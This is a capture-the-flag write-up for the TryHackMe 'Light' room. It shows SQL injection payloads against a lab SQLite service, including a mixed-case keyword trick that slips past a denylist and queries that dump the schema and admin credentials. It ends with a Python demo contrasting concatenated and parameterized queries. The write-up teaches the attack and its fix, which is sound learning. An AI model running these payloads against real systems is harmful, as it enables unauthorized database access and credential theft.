Challenges: Light (TryHackMe)

The “Light” challenge simulates a database application that is vulnerable to SQL injection. By connecting to the service running on port 1337, we’re able to interact with the backend through user input. The goal is to enumerate the database, extract sensitive information such as usernames and passwords, and ultimately retrieve the hidden flag. This task emphasizes the importance of secure query handling and input validation.
I am working on a database application called Light! Would you like to try it out?
If so, the application is running on port 1337. You can connect to it using nc MACHINE_IP 1337
You can use the username smokey in order to get started.
Note: Please allow the service 2 - 3 minutes to fully start before connecting to it.
Answer the questions below
What is the admin username?
nmap -sV IP_Address

nc 10.10.87.187 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL

What is the password to the username mentioned in question 1?
Input: ' OR 1=1 --
Output: For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)

Input: ' union
Output: Ahh there is a word in there I don't like :(

Input: ' UnION
Output: Error: unrecognized token: "' LIMIT 30"

Input: ' UnION SeleCT 1 '
Output: Password: 1

Input: ' UnION SeleCT version() '
Output: Error: no such function: version

Input: ' UnION SeleCT sqlite_version() '
Output: Password: 3.31.1

What is the flag?
Input: ' UnION SeleCT group_concat(sql) from sqlite_master'
Output: Password: CREATE TABLE usertable ( id INTEGER PRIMARY KEY, username TEXT, password INTEGER),CREATE TABLE admintable ( id INTEGER PRIMARY KEY, username TEXT, password INTEGER)

Input: ' UnION SeleCT group_concat(username) from admintable '
Output: Password: TryHackMeAdmin,flag

Input: ' UnION SeleCT group_concat(password) from admintable '
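The service's error messages suggest a case-sensitive denylist (/*, --, %0b and the lowercase word "union") in front of a query built by string concatenation, which is why the mixed-case UnION / SeleCT spelling goes straight through. The following Python script is an added illustration, not the room's actual source code: it reconstructs that denylist and the query shape implied by the "' LIMIT 30" error, rebuilds the two tables returned from sqlite_master in an in-memory SQLite database with constructed placeholder rows (the admin password and flag values are placeholders, not the real ones), and contrasts the concatenated query with a parameterized one. The function names and the exact denylist are assumptions.

```python
import sqlite3

# Schema copied from the challenge's sqlite_master output; row contents are
# constructed for this demo (smokey's password is the one shown on the page,
# the admintable values are placeholders).
DEMO_SCHEMA = """
CREATE TABLE usertable (id INTEGER PRIMARY KEY, username TEXT, password INTEGER);
CREATE TABLE admintable (id INTEGER PRIMARY KEY, username TEXT, password INTEGER);
INSERT INTO usertable (username, password) VALUES ('smokey', 'vYQ5ngPpw8AdUmL');
INSERT INTO admintable (username, password) VALUES ('TryHackMeAdmin', 'ADMIN_PASSWORD_PLACEHOLDER');
INSERT INTO admintable (username, password) VALUES ('flag', 'FLAG_PLACEHOLDER');
"""

# Hypothetical reconstruction of the service's filter: a plain substring
# check, case-sensitive, so "UnION" is not matched by "union".
DENYLIST = ("/*", "--", "%0b", "union")


def build_demo_db() -> sqlite3.Connection:
    """Create the in-memory database used by both lookups."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(DEMO_SCHEMA)
    return conn


def denylist_rejects(user_input: str) -> bool:
    """True when the (case-sensitive) denylist would refuse the input."""
    return any(bad in user_input for bad in DENYLIST)


def vulnerable_lookup(conn: sqlite3.Connection, user_input: str):
    """The bug: user input is spliced into the SQL text.

    Returns the password cell, None for no match, the string
    "rejected by denylist" when the filter triggers, or "Error: ..." when
    SQLite cannot parse the resulting statement.
    """
    if denylist_rejects(user_input):
        return "rejected by denylist"
    # Query shape inferred from the "unrecognized token: \"' LIMIT 30\"" error.
    query = f"SELECT password FROM usertable WHERE username = '{user_input}' LIMIT 30"
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as exc:
        return f"Error: {exc}"
    return row[0] if row else None


def safe_lookup(conn: sqlite3.Connection, user_input: str):
    """The fix: a bound parameter. The input is always data, never SQL,
    so no denylist is needed and no spelling trick changes the query."""
    query = "SELECT password FROM usertable WHERE username = ? LIMIT 30"
    row = conn.execute(query, (user_input,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_demo_db()
    payload = "' UnION SeleCT group_concat(username) from admintable '"
    print("lowercase union :", vulnerable_lookup(db, "' union"))
    print("mixed case, vuln:", vulnerable_lookup(db, payload))
    print("mixed case, safe:", safe_lookup(db, payload))
    print("legit user, safe:", safe_lookup(db, "smokey"))
```

Running it shows the denylist catching only the lowercase spelling, the concatenated query returning the admintable usernames for the mixed-case payload, and the parameterized query returning no row for the same input because the whole string is compared against the username column as a literal value.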

Through SQL injection, we successfully bypassed authentication, enumerated database tables, and uncovered the administrator’s credentials along with the final flag. This challenge demonstrates how a single overlooked vulnerability in input sanitization can lead to full database compromise. Proper use of parameterized queries and input filtering is crucial to prevent such attacks in real-world applications.